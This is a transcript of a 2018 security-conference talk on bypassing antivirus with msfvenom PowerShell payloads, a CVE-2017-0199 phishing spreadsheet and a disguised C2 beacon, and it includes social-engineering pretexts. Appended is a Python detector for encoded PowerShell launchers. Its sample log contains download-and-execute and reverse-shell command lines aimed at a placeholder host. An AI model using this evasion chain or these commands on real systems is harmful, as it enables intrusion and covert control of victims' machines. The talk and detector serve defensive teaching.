
PG - Bypassing Antivirus Engines using Open Sourced Malleable C2 Software, MSFVenom, Powershell and a bit of Guile

BSides Las Vegas | 24:42 | 279 views | Published 2018-09
About this talk
Bypassing Antivirus Engines using Open Sourced Malleable C2 Software, MSFVenom, Powershell and a bit of Guile - Michael Aguilar Proving Ground BSidesLV 2018 - Tuscany Hotel - Aug 08, 2018
Transcript [en]

First off, I apologize about the title. I was up for about 36 hours when I came up with that idea for these submissions, so it was interesting. I'd just passed my CP, was feeling a bit froggy, and I was like, you know what, let's go ahead and just do something. So I did that, and the title came out a bit long. Anyways, I kept it just to be concise with what I did for the submissions. So anyways, we'll just kind of go ahead and move on. Sorry, I'm a bit, like, you know, nervous. So a little bit about me: my name is Michael, you can call me Vega, that's my handle on pretty much everything. But I have a

Twitter, data cost; I also have a website and former security. Currently, just, you know, work-wise, I do penetration testing for medical devices for a company called BD. Off time, I just like to do things not computerized: cycle, kind of get in nature, realize there's other things to do besides sitting just behind this lovely thing. And I really wanted to give a giant thanks to, again, the people who I put through hell for this: my wife Cam, my son River and my daughter Lily, because I was like a mess for like weeks, you know, just doing stuff. So anyhow, moving along. So when you're entering a network for a red team or a penetration testing

engagement, obviously if you're doing a black box test you're going to be coming from the outside in. And using that kind of theory, you know what's going to go wrong: as soon as you enter the bastion of any kind of castle, there's guards, those defenses, those mechanisms to start to stop you. Same thing with any kind of computer: there's going to be items that you have to emulate if you're doing a red team assessment, with regards to threat actors and different ways to get your goals obtained. Again, if you're doing a straight real-world scenario there will be some kind of systems in play, antivirus, just something to try to block you. Normally there should be. So one of

the things I was doing one day, I was just bored and I was like, you know, I don't like that little thing that goes off when I compile something, so I'm just going to try to bypass the enterprise engine that I had on my system. So, just looking at Windows topography, and if you think logically, they're using Windows, and a lot of times when you go to a terminal and you just type in PowerShell you actually get the PowerShell prompt. It's 2018; a lot of people use PowerShell for good, legitimate reasons, for systems administration and things, but the problem is that a lot of the users don't have any kind of real use for this kind

of system. It's something that's not restricted but something that's available to them, and it's a very big, you know, threat platform to attack, and it's very rich because it's actually physically on the Windows system natively, very robust. So my thought was, again, I just want to test these things. I wanted to get past the antivirus engine; I wanted to try to affect it using PowerShell, something native to the system, without trying to introduce any kind of other external tools. And why do I want to do that? I want to do something in memory. I want to try to use less network traffic, you know, with the shuttling of the information back and forth. If I have something hosted on my

attacking machine and the client connects to it, it's less traffic transferring back and forth than if I'm just dropping an executable. Also, again, PowerShell itself is very robust: you can do basic tasks and anything up to complete TCP command shells, and it just seems like a very good candidate to start poking around within the Windows topographies. So again, looking at what my adversary is going to be running under the hood: antivirus has a lot of different things, but there's similarities between a lot of these engines. If you go for the standard, you know, double-click install, you know, push out to a hundred thousand clients or something, a lot of times these antivirus have, you know, signatures. Sometimes they

say they don't have signatures, they have modules, but it's something to match a fingerprint of an actual file. I still consider it signature-based and a bit old, but it's something that does exist a lot of times. Also, depending on the infrastructure and what kind of antivirus engine you're deploying, there'll be antivirus, there'll be traffic analysis trying to determine malicious command and control software back and forth, behavioral analysis, in-memory sandbox. You have various scanners to look for unsafe applications, unwanted applications, things like keyways. Also, if you look into the Windows topography, there's an AMSI scanner; there's something that's gonna be able to hook into the Windows SDK to be able to scan locally executed PowerShell scripts and

try to determine if those operations are malicious or not. So again, from Microsoft, AMSI generally serves to integrate with your anti-malware AV product, and it provides a closer look at those executed scripts. So in the examples I'm going to show you, these are just some antivirus engines I downloaded. I tried to go for the business versions initially, but some of them, it looks like you need like an encyclopedia to actually launch the thing, so I just didn't want to take the time. But they are the fully updated clients. So just going over just a couple examples. This is just generic, you know, trying to bring an executable over to a machine. Now, people are

very familiar with things like Metasploit, Meterpreter. It's an easy connection back and forth; it allows you to do your workload. But as you see here, transferring a Metasploit file is very detectable. It's something that there is, you know, a lot of signatures based around, you know, the functionality. Metasploit is very well known, so these well-known things have a lot of items and signatures based around their functionality. So again, looking at this: a PowerShell file was detected, a PowerShell executable was detected, Meterpreter executable, again, easy detections. This is an ESET system. This one has every bell and whistle turned on, every kind of update. It's actually currently updated, all the modules are actually currently updated, everything's

fine. So this is just executing a Meterpreter reverse connection from client A to my attacking machine. Now the problem you see here is that, unfortunately, if you go back a bit, that Meterpreter session is still very much live. The file itself, the PowerShell file, has been quarantined, but unfortunately the Meterpreter session is undetected. So again, you want to take a little further scan in the operating memory, and this is something that actually most antivirus engines should be able to detect: something that is very known, something that they know, I know they have signatures for, that should be detected in operating memory as a running object. And this is actually on all of their websites, with marketing as to, you know,

what they have inclusively. So again, with this scenario, just a very generic, uh, non-obfuscated PowerShell reverse TCP connection, machine A to machine B. File gets detected, that's fine, you took the file, but unfortunately you still have full control of the machine on the back end. So I'm not sure that that's really a good thing, and it would be more towards the blue team, like who's watching the, you know, logging, to make sure that they would investigate that kind of object. Because a lot of people would take that at face value: it quarantined it, I'm good. So moving along. That was good, but we're almost to the point where we want to be. So again, we won't normally be as

lucky as in that example, where we just get to execute a PowerShell script. A lot of times we're going to have to do it remotely, or we're going to have to use some kind of mechanism to be able to have a client execute the script for us. We're not going to get that joy of being able to just drop a PowerShell script and just execute and I've got the command. So looking at that, what is the one thing in a computer scenario that runs the computer? It's the person. So people are, unfortunately, very malleable, and I use this picture a ton, I've used it for years, but it makes complete sense. You can have

every single detection, you know, AI, I have a machine-learning monster that will kill any antivirus, and then on the other side you have this guy Dave. Dave likes to click things. You send Dave an email, Dave's gonna open it. Dave also happens to be the CEO, so you're not gonna really tell Dave, like, you know, you really shouldn't open that email addressed to you. He opens whatever, signs up for whatever, uses his corporate email. So again, targeting the people, and, you know, taking a look back at user training, you know, people are malleable, they like to do things. It's reciprocation, you know: if I give you something, of course you're going to want to be polite initially and

try to give something back. So in this example, again, the execution of PowerShell scripts from clients to attacker: we'll go ahead and say that, let's execute the script. We conducted a phishing exercise, we sent out an Excel script, or Excel file, to a large financial institution, and they had it, and we're like, you know, priming them to open it: hey, you know, did you get my order? You know, hey, I sent you the information for the stuff, I've not gotten any information back, can you please take a look at this file, it's kind of immediate for my business. Keep them on the line, give something to kind of go by, but you can easily probably get

that person, depending on their function, to do the execution for you. So in this scenario, what I'm doing is I'm creating a just very generic, and this again using Metasploit, msfvenom, PowerShell script that's using x64 XORing for the encoding, so it's obfuscating the code a bit, and it's just going to execute using CVE-2017-0199. This is the malicious HTA handlers in Office documents. It has been patched in, I should say, Word, but unfortunately they left it open in Excel, which is kind of interesting, because it's like, you know, if you would fix the suite, why don't you just do it all? Anyways, it's still there, it's still

valid and it still works. So in this scenario, what I did was I created the file and we're gonna host it on my attacking machine. This is just going to be the PowerShell script that you can see right there; that's going to be a reverse TCP connection from the client to my machine. And I'm gonna, so, Python SimpleHTTPServer, just serving up HTTP traffic. And then, again, in our phishing scenario, you know, we've sent the company, you know, their lovely documents, you know, we got them on the line, you know, we're sending, adding that urgency. And as you see, ESET's fully updated, every module's on, everything's good to go, everything's updated: the AMSI scanner, all the suspicious, all the anti-stealth, all the firewall settings, literally turned every single thing on and killed this VM. But the problem that you'll notice is that when our unsuspecting user has gotten this file, it shows clean and would be able to get past a lot of the filters that they have in Outlook. Now, this document obviously doesn't require some user interaction; as you saw right there, there was a small thing that popped up and said, you know, obviously, would you like to run Excel, MS excel.exe? You're opening Excel, so yes you would. And to the unsuspecting person, especially, you know, the high-impact financial industry,

they'll go ahead and open it anyway. So, you know, everybody likes money, you know, sorry, the Excel document's kind of J, but, you know, money, money, money. But Excel's a big document, so you can hide a lot of stuff in, like, a lot of cells. And if you notice right there, now I have a reverse TCP connection from that client to my machine, all by opening that Excel file. And if you go back to ESET, again we scan the file, nothing's there. We've scanned it, simulate fast forward, then go forward and scan the operating memory, and again trying to detect the object that's actually running in operating memory as an administrator: nothing's there.

So basically now you just used the CVE that's widely available, put a PowerShell script in it, executed in memory, and then bypassed the detections off the disk with all the antivirus and all the bells and whistles. Same thing with McAfee: opened the same workbook, it's the same exact code, and what you'll notice is that it just opens that perfectly fine as it did before, and you have that reverse TCP connection sitting on your attacking machine. There goes the GET, and there's the attack. So just taking a step back and just thinking, you know, how do these tests go, with antivirus vendors testing their protection mechanisms against, like, massive amounts of attacks? Normally what they'll do is, on, like, say, a

they'll have, like, a tester, like, you know, these PC magazines that'll get a bunch of executables and drag them over and execute them and see how they do. So using that kind of scenario, I wanted to do the same thing, and also want to show you some variants in the following text. This is a standard Metasploit reverse TCP connection, just PowerShell, okay, I'm sorry, just an executable that I created, just something generic, msfvenom. So as you can see, 37/66 vendors were able to detect it. Normally you wouldn't upload your payloads, but I needed an example, and honestly these payloads are very simple and they're easily recreated, so these signatures, these detections, are pretty

standard. But if you take that file and move it over to PowerShell, there's one person that's detecting that file. Same things, executable versus PowerShell. So I wanted to kind of meld the two, kind of try to combine them. So what I did was, I just thought, you know what, let's just go kick it in the face. A lot of times these AV vendors will take their product and they'll just say, you know what, just throw everything at it, so we'll dump a, we'll give a thumb drive full of, you know, malicious software, double-click everyone, see if we pass. So that's what I thought I'd do. What I did was I created an executable that is

based off of a malleable C2 software. Now, for those not familiar with those kinds of software, it's basically command and control software where you can change the traffic profiles to make it look like something else, so a simple request and reply back from a client will look like something like Amazon. They have a lot of these, I think Cobalt Strike and various other frameworks; there's a lot of open source ones, Empire. But I was looking through GitHub and I found an interesting one that I liked, and I forked it on GitHub, and I'm still developing some modules for it. But I was like, okay, let's go ahead and take something that's completely out of left

field, create an executable based off of that. So we're taking the PowerShell command, putting that into msfvenom as a Windows command, and then obfuscating that Windows command with x64 XORing, and then taking that C code and then placing that into a skeleton executable, and then just dragging it over to the machine. So now that executable is going to be executing the underlying PowerShell script, and then you should have magic release detections of, if you're going to detect something, and use all the bells and whistles of the AV system that you say you have. So using this C2 software, I just set up a quick listener on my local IP address, so that basically it would

connect back to me and it would give me access to it once I got the reverse connection. And right there you can see that it's generating a PowerShell command. Now, the PowerShell command, again, is base64 encoded, so it needs to be inflated before execution, but what I'm doing is taking that and I'm piping that just directly into the PowerShell command, and then taking that and making that C code as the output, and then creating the beacon.c. And then once that's created, we now have this lovely shellcode that we can put into our skeleton executable right over here. And then this skeleton executable, again, in, what this thing is, Visual Studio, we'll just go ahead and

compile it to make it into an executable. So we now have the executable compiled, and let's go ahead and build it. So you don't want to see me ever on the building, but basically the only thing you need to do with this, and I'm actually going to publish this on my website later after here, I'll just put all those schematics and everything, so all you have to do is take your C code, pipe it into the framework, you add the byte size for your payload, it expands and it executes perfectly fine. So moving on, take the 64-bit executable, and then here is our execution. So sorry, the threats were earlier from detection when I was playing around, but as you can see

right here, we'll go ahead and scan it. It was so close to, file scan, everything's clean. Go ahead and run it, again, beacon executes and nothing, but if you look at your clients list you now have a Win 10 client. Now again, what's the harm in that? You now have a Windows 10 client that has the ability to accept commands from an external agent, send them back and forth with encrypted SSL traffic, and make it look like Amazon. And so again, this took all the bells and whistles of the AV and kind of put it to its test, to say, did your botnet detection detect us? Did your signature detect us? Did your, you know, heuristic analysis or any

of your in-memory sandboxing detect us? And the answer's no, and unfortunately that's just due to the kind of, not unpopularity, but the pervasiveness of PowerShell usage and the ability to do multiple things, and just how PowerShell is growing and they're not really, again, limiting it in the enterprise. And we, personally, I've seen many assessments where I've gone into, and, you know, you mention, does everybody have access to PowerShell? And I see a lot of the CEOs, like, you know, get quiet, and they, like, you know, talk amongst themselves and they start writing stuff down, like, and that's not good, because it's like, you know, it's 2018 and some of these infrastructures are actually pretty

critical. So it's more of an awakening to not just deploy one thing, but make sure that you're doing things in layers and looking at the best solutions and actually testing them, and maybe taking them apart and seeing if their mechanisms are really as good as they say. Then moving along, again, this is just McAfee, same thing, everything scans, everything goes in. Now, the beauty of this kind of framework is that this particular framework actually gives you all the access to all the PowerShell modules from Nishang, Empire and PowerSploit, and any other PowerShell add-on you can think of you can just add into the appropriate folder, so it makes it nice and neat, shaking down pouches

and do whatever you want up to that point. And I believe actually that was about it. Oh, sorry, there was one more slide: state actors and the people that are actually using this. Looking a little bit into the topic, I was researching, you know, on MITRE's ATT&CK website, looking at different TTPs for various adversary groups. A lot of times, again, if you'll notice, like, the various APT groups, they are utilizing these kinds of frameworks, and a group called Bronze Butler was observed using it in 2017, and a lot more groups are actually utilizing these kinds of frameworks to actually affect systems. And until Microsoft comes up with some other kind of scripting engine that's going to be taken advantage of in the

same way, then this is going to be the kind of de facto, and the things that we're going to have to look for in the future. So, questions? Who's going to say, there had to be at least one. Can you post a website up

you want? I got cards up here and even this, even has the website on it. Okay, it's gonna be under the research section. Thank you. Slow to answer a question, okay, gotcha, the Madonna thing, sorry, abstain from this. Yes sir? Did you test against any of the EDR tools, were they any better at detecting? I do have access to some EDR tools. I did not publish in here. I did test against two that I used to work with personally and professionally. No, they didn't do too grand. One of them was able to locate, obviously, the traversal of files, but the other one did not detect anything with regards to information going out, or even the

execution of the PowerShell scripting initially, which was kind of disconcerting. Also, in one of the examples I was showing with regards to the execution of the PowerShell scripting, with ESET, or actually with any of them, the ones that went through, oddly enough, when you did not have the AV installed, the Windows Defender located the actual CVE, but you install the AV and it didn't. So basically you're lessening your security by adding more vendors, which was interesting in itself. So do you have any examples of the network traffic before and after you put it through the C2? Oh yes, like pcaps? I do, actually, something I did, and I was so nervous I actually spaced on that, but

it is right here, and yes, right here. So right here you see that client hello; a client hello is going to, again, Amazon, and if you look at the traffic further down, so I kind of, like, messed up the traffic, just a command-and-control portion, there's not really much you can get out of there. All the traffic looks very benign, and unless you're really monitoring it, again, it's going to be the monitoring of this and the red team or, sorry, the blue team's tool. Yeah. Mallets? Let's see, besides a bit pre-recorded. So you wanted to see the cert, like, under? Yeah, yeah. I can't, it's live, it's not a live demo. Oh, it's a video. I was

like, I think I get what you're saying, but, like, I'm trying to determine, is he, like, pranking me? Or, like, just because I'm really nervous, I'm like, trying to actually do this, is that guy, I thought it was gonna get it to work for a second. Yeah, I just, you had Vega C2, you're Vega, so did you develop that C2? Yeah, it was a fork off GitHub, and I modified it because I didn't want to, like, put the person on blast that created the original, and also I'm going to develop it a little bit differently with regards to the modules that are currently active. There's some items that needed to be

completed. I've nearly got the keylogger completed, I just need to clean it up a little bit with the traffic and then it will be ready. Yeah, Cobalt Strike never got back to my request for a trial, I tried. All right, I guess you'll be available for any other questions? Yeah, no, I'll be here. Cool.
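Added example, not the speaker's code or the C2 framework he describes: a small Python detector for the blue-team side of the talk, which pulls -EncodedCommand payloads out of process-creation log lines, decodes them the way PowerShell does (base64 over UTF-16LE) and flags the traits the demos rely on, a reverse TCP client and a script fetched from a hosted URL and run in memory. The log format, the indicator names and the sample lines are assumptions constructed for this example.

```python
"""Flag base64-encoded PowerShell launchers in process-creation log lines.

Assumed log format (constructed for this example, not real telemetry):
one process start per line, "<timestamp> <image> <command line>".
"""
import base64
import re

# Traits checked for; the names are labels chosen for this example.
INDICATORS = {
    "reverse_tcp": re.compile(r"Net\.Sockets\.TCPClient", re.I),
    "download_to_memory": re.compile(r"Net\.WebClient|DownloadString|DownloadFile", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
}

# powershell.exe accepts unique prefixes of -EncodedCommand; -e, -ec and -enc are the usual ones.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def encode_command(script: str) -> str:
    """Encode a script the way PowerShell expects for -EncodedCommand (UTF-16LE, then base64)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries an -EncodedCommand payload, else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_line(line: str) -> dict:
    """Classify one log line: which indicators fire on the command line and its decoded payload."""
    timestamp, image, cmdline = line.split(" ", 2)
    findings = []
    script = decode_encoded_command(cmdline)
    if script is None:
        haystack = cmdline
    else:
        findings.append("encoded_command")
        # Drop the base64 blob so the patterns see the real flags plus the decoded script.
        haystack = ENC_FLAG.sub("", cmdline) + "\n" + script
    for name, pattern in INDICATORS.items():
        if pattern.search(haystack):
            findings.append(name)
    return {"timestamp": timestamp, "image": image, "findings": findings}


def scan(log_text: str) -> list:
    """Return only the lines on which at least one indicator fired."""
    results = [analyze_line(l) for l in log_text.splitlines() if l.strip()]
    return [r for r in results if r["findings"]]


# Constructed sample: a benign admin command, a plain download-and-execute launcher like the
# hosted-script phishing case in the talk, and an encoded launcher opening a reverse TCP client.
# 203.0.113.10 is a documentation address, not a real host.
SAMPLE_LOG = "\n".join([
    "2018-08-08T10:01:02Z powershell.exe powershell.exe -NoProfile -Command Get-Service",
    "2018-08-08T10:05:17Z powershell.exe powershell.exe -w hidden IEX (New-Object Net.WebClient)"
    ".DownloadString('http://203.0.113.10/x.ps1')",
    "2018-08-08T10:09:44Z powershell.exe powershell.exe -nop -w hidden -enc "
    + encode_command("$c = New-Object Net.Sockets.TCPClient('203.0.113.10', 4444)"),
])

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["timestamp"], hit["image"], ", ".join(hit["findings"]))
```

The file quarantine in the demos never touched the running session, which is why the decoded command line, not the dropped file, is the artifact worth alerting on.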